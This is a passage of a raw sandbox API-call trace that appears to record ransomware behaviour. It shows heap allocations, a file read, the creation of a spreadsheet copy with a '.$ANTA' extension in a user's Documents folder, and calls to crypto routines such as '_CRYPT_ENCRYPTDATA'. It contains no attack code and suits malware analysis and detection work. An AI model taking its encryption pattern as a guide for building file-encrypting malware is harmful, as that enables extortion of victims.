RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7e48 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ad0 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0081.953] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0081.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0081.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0081.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.953] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\lwek-jelbvy6ehj.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0081.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0081.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.954] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0081.954] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0081.954] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0081.954] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0081.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0081.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0081.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0081.958] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0081.958] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x6285, lpOverlapped=0x0) returned 1 [0081.959] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0081.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6285) returned 0x499a008 [0081.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e08020 | out: hHeap=0x1780000) returned 1 [0081.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0081.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6285) returned 0x49a0298 [0081.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0081.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.964] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0081.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6285) returned 0x499a008 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.965] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0081.965] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0081.965] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0081.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b00 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6285) returned 0x499a008 [0081.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a50 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b10 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb198 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6285) returned 0x49a6528 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0081.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0081.967] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0081.968] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0081.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0081.968] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0081.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0081.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2930 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb240 [0081.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0081.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0081.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0081.969] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0081.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0082.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0082.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0082.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.010] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.011] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, 